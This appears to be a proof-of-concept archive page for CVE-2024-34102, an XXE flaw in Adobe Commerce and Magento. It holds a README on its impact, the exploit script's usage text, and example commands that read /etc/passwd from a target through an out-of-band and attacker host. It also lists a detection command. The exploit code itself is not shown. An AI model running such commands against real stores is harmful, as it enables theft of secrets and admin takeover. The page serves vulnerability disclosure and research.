Associated Vulnerability
Title:XXE can expose crypt key and other secrets granting full admin access (CVE-2024-34102)Description:Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution. An attacker could exploit this vulnerability by sending a crafted XML document that references external entities. Exploitation of this issue does not require user interaction.
Description
CosmicSting: critical unauthenticated XXE vulnerability in Adobe Commerce and Magento (CVE-2024-34102)
Readme
# CosmicSting: critical unauthenticated XXE vulnerability in Adobe Commerce and Magento (CVE-2024-34102)
CVE-2024-34102 is a severe security flaw arising from improper handling of nested deserialization in Adobe Commerce and Magento. This vulnerability permits attackers to exploit XML External Entities (XXE) during the deserialization process, potentially allowing remote code execution. In short, attackers can craft malicious JSON payloads that, when deserialized by the application, instantiate objects with unintended properties or behaviors. This could lead to various security risks.
Exploiting this vulnerability allows attackers to gain unauthorized admin access to REST API, GraphQL API, or SOAP API, potentially leading to data theft, service disruption, and complete compromise of affected systems. This vulnerability poses a significant risk due to its ability to exfiltrate sensitive files, such as app/etc/env.php, containing cryptographic keys used for authentication. Attackers can exploit this to forge administrator tokens and manipulate Magento's APIs as privileged users.
Moreover, CVE-2024-34102 can be chained with other vulnerabilities, such as the PHP filter chains exploit (CVE-2024-2961), leading to remote code execution (RCE). The broader implications of XML External Entity (XXE) vulnerabilities enable attackers to retrieve and manipulate data from external sources, exacerbating the potential impact on compromised systems.
## Usage
```
usage: exploit.py [-h] --target TARGET --read-file READ_FILE [--oob-server OOB_SERVER] [--host-server HOST_SERVER]
Exploit script for XXE vulnerability
options:
-h, --help show this help message and exit
--target TARGET, -t TARGET
Target URL (http(s)://ip[:port])
--read-file READ_FILE, -r READ_FILE
File to read from the remote host
--oob-server OOB_SERVER, -ob OOB_SERVER
OOB server URL (http(s)://ip[:port])
--host-server HOST_SERVER, -hs HOST_SERVER
Host server URL (http(s)://ip[:port])
```
Examples
```bash
# Run with local attacker server and local OOB server
python3 exploit.py -t https://magento.test -r "/etc/passwd"
# Run with remote attacker server and remote OOB server
python3 exploit.py -t https://magento.test --oob-server http://xxx.oasitfy.com --host-server https://remote-attacker-server.com -r "/etc/passwd"
# Detection
python3 detect.py -t https://magento.test
```
## Disclaimer
This exploit script has been created solely for the purposes of research and for the development of effective defensive techniques. It is not intended to be used for any malicious or unauthorized activities. The author and the owner of the script disclaim any responsibility or liability for any misuse or damage caused by this software. Users are urged to use this software responsibly and only in accordance with applicable laws and regulations. Use responsibly.
File Snapshot
[4.0K] /data/pocs/e87abe819bc4391dff7edcb477d902317e4598d7
├── [4.6K] detect.py
├── [4.5K] exploit.py
├── [1.0K] LICENSE
└── [2.9K] README.md
0 directories, 4 files
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →